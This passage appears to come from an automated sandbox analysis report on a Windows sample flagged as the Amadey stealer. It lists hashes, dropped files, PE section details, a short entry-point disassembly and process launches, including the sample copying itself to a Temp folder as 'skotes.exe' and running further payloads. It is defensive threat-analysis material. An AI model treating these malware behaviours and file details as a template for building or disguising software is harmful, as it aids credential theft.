                                                                                                                                                                                                                            Size (bytes):132753
                                                                                                                                                                                                                            Entropy (8bit):5.436889094730482
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:fokJQ7O4N5dTm+syHEt4W3XdQ4Q6cuSr/nUW2i6o:fdQ7HTt/sHdQ4Q6cDfUW8o
                                                                                                                                                                                                                            MD5:729D948581ADBDC2FA38F565D4B78465
                                                                                                                                                                                                                            SHA1:7F6C23FC7EFFA46C94C35FEBF08AEC78DC8A6A27
                                                                                                                                                                                                                            SHA-256:773FD5A7659A965E1913DA0435A150B9A5B012D1D79365D33B075A78C33D3915
                                                                                                                                                                                                                            SHA-512:85E111AE08B3BDCC7A3FE4DE0BA3A051CC08F52C7ACE5218B2C66AAE116C0FF48C2921E51531F26EA8DDD4A575BEED56CAB2756316F47B2D5AB4C1CEADFA2714
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                                            Chrome Cache Entry: 176

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2410)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):175897
                                                                                                                                                                                                                            Entropy (8bit):5.549876394125764
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:t0PuJ7UV1+ApsOC3Ocr4ONnv4clQfOQMmzIWrBQoSpFMgDuq1HBGANYmYALJQIfr:t0PuJQ+ApsOOFZNnvFlqOQMmsWrBQoSd
                                                                                                                                                                                                                            MD5:2368B9A3E1E7C13C00884BE7FA1F0DFC
                                                                                                                                                                                                                            SHA1:8F88AD448B22177E2BDA0484648C23CA1D2AA09E
                                                                                                                                                                                                                            SHA-256:577E04E2F3AB34D53B7F9D2F6DE45A4ECE86218BEC656B01DCAFF1BF6D218504
                                                                                                                                                                                                                            SHA-512:105D51DE8FADDE21A134ACA185AA5C6D469B835B77BEBEC55A7E90C449F29FCC1F33DAF5D86AA98B3528722A8F533800F5146CCA600BC201712EBC9281730201
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.Ui=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Vi=class extends _.Q{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var Wi,Xi,aj,dj,cj,Zi,bj;Wi=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};Xi=function(){_.Ka()};aj=function(a,b){(_.Yi||(_.Yi=new Zi)).set(a,b);(_.$i||(_.$i=new Zi)).set(b,a)};dj=function(a){if(bj===void 0){const b=new cj([],{});bj=Array.prototype.concat.call([],b).length===1}bj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ej=function(a,b,c){a=_.rb(a,b,c);return Array.isArray(a)?a:_.Ac};._.fj=function(a,b){a=2&b?a|2:a&-3;return(a|32)&-2049};_.gj=function(a,b){a===0&&(a=_.fj(a,b));return a|1};_.hj=function(a){return!!(2&a)&&!!(4&a)||!!(2048&a)};_.ij=function(a,b,c){32&b&&c||(a&=-33);return a};._.lj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ej(a,b,d);var k=h[_

                                                                                                                                                                                                                            Chrome Cache Entry: 177

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):5162
                                                                                                                                                                                                                            Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                            MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                            SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                            SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                            SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

                                                                                                                                                                                                                            Chrome Cache Entry: 178

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1660
                                                                                                                                                                                                                            Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                            MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                            SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                            SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                            SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

                                                                                                                                                                                                                            \Device\ConDrv

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):15
                                                                                                                                                                                                                            Entropy (8bit):3.906890595608518
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:SXhRi75n:SC5
                                                                                                                                                                                                                            MD5:3A33AF4BC7DC9699EE324B91553C2B46
                                                                                                                                                                                                                            SHA1:4CCE2BF1011CA006FAAB23506A349173ACC40434
                                                                                                                                                                                                                            SHA-256:226D20C16ED4D8DDDFD00870E83E3B6EEDEDB86704A7BF43B5826B71D61500AE
                                                                                                                                                                                                                            SHA-512:960194C8B60C086520D1A76B94F52BA88AC2DDEC76A18B2D7ABF758FFFF138E9EDD23E62D4375A34072B42FBA51C6D186554B1AA71D60835EF1E18BEB8873B1D
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:1.29548Enjoy!..

                                                                                                                                                                                                                            Static File Info

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Entropy (8bit):6.625976257413819
                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                            File name:cMTqzvmx9u.exe
                                                                                                                                                                                                                            File size:3'238'912 bytes
                                                                                                                                                                                                                            MD5:0a8673bbea31ae21e9e87be408752436
                                                                                                                                                                                                                            SHA1:a8c29df353c7af7928ce3e24a9f606f0787109ac
                                                                                                                                                                                                                            SHA256:e2ae261a55bc83c0e3c9ab657a16d2c76a329b6a4ff40370119e079f2631b69c
                                                                                                                                                                                                                            SHA512:31d1336cf35adecbed5d42e6910b24fbe01e4671aa12815c5d1d00b27f93228f35f290f570c4142622d53f8b91b4adc764020ec2d52a5ed18794308ebc64aad3
                                                                                                                                                                                                                            SSDEEP:49152:aUnOVfsVG4mPq3wMSk7+7NNnAXbfHQfiXCbSByOPssk:vnafcXmPUwMSk7+TnuLyTO0
                                                                                                                                                                                                                            TLSH:FBE54AA365047ECBC08D6A7C485BCD599E7C82A9071108E7ECF9687B7D63CC612BBC25
                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................

                                                                                                                                                                                                                            File Icon

                                                                                                                                                                                                                            Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Entrypoint:0x717000
                                                                                                                                                                                                                            Entrypoint Section:.taggant
                                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                            Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                            File Version Major:6
                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                            jmp 00007F0EC4E649DAh
                                                                                                                                                                                                                            cmovp esi, dword ptr [ecx]
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add cl, ch
                                                                                                                                                                                                                            add byte ptr [eax], ah
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [ebx], cl
                                                                                                                                                                                                                            or al, byte ptr [eax]
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], dh
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [edi], bh
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [edx], ah
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax+eax*4], cl
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            adc byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add al, 0Ah
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            xor byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], 00000000h
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [ecx], al
                                                                                                                                                                                                                            add byte ptr [eax], 00000000h
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            adc byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add cl, byte ptr [edx]
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            inc eax
                                                                                                                                                                                                                            or al, byte ptr [eax]
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax+eax*4], cl
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            adc byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            or ecx, dword ptr [edx]
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            xor byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            aas
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [edx], ah
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [ecx], cl
                                                                                                                                                                                                                            add byte ptr [eax], 00000000h
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al

                                                                                                                                                                                                                            Data Directories

                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x5d4.rsrc
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x315b140x10qbaikvfg
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x315ac40x18qbaikvfg
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                            Sections

                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                            0x10000x680000x68000bb83cb49b6c2fb6a8856dfcaedbabc22False0.5552109938401443data6.951830958774063IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                            .rsrc0x690000x5d40x6001e55db351164df1643ae87d7efa3ee0fFalse0.4303385416666667data5.417125179370491IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                            .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                            qbaikvfg0x6b0000x2ab0000x2aac005bf7948eaa47b3a2e3cf26d544b2a638unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                            scclittj0x3160000x10000x60035b8de026487eb0f4393f50a2ec4cb69False0.5305989583333334data4.794129837279969IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                            .taggant0x3170000x30000x22003190458f584ea9cb660d674e3b9ff8cbFalse0.06135110294117647DOS executable (COM)0.6715129096807252IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                            Resources

                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                            RT_MANIFEST0x690700x3e4XML 1.0 document, ASCII text0.48092369477911645
                                                                                                                                                                                                                            RT_MANIFEST0x694540x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                                                                                                                            Imports

                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                            kernel32.dlllstrcpy

                                                                                                                                                                                                                            Possible Origin

                                                                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                            EnglishUnited States

                                                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                                                            Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                            Start time:05:22:20
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\cMTqzvmx9u.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\cMTqzvmx9u.exe"
                                                                                                                                                                                                                            Imagebase:0xb00000
                                                                                                                                                                                                                            File size:3'238'912 bytes
                                                                                                                                                                                                                            MD5 hash:0A8673BBEA31AE21E9E87BE408752436
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1491932263.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                            Start time:05:22:22
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                                                                            Imagebase:0xbd0000
                                                                                                                                                                                                                            File size:3'238'912 bytes
                                                                                                                                                                                                                            MD5 hash:0A8673BBEA31AE21E9E87BE408752436
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1521311555.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                            • Detection: 50%, ReversingLabs
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                            Start time:05:22:23
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                            Imagebase:0xbd0000
                                                                                                                                                                                                                            File size:3'238'912 bytes
                                                                                                                                                                                                                            MD5 hash:0A8673BBEA31AE21E9E87BE408752436
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.1522880580.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                                            Start time:05:23:00
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                            Imagebase:0xbd0000
                                                                                                                                                                                                                            File size:3'238'912 bytes
                                                                                                                                                                                                                            MD5 hash:0A8673BBEA31AE21E9E87BE408752436
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                                            Start time:05:23:14
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe"
                                                                                                                                                                                                                            Imagebase:0xfd0000
                                                                                                                                                                                                                            File size:2'931'200 bytes
                                                                                                                                                                                                                            MD5 hash:1C22D90D4F3C0BE6834E0777C7B4D18A
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                                            Start time:05:23:23
                                                                                                                                                                                                                            Start date:24/12/2024
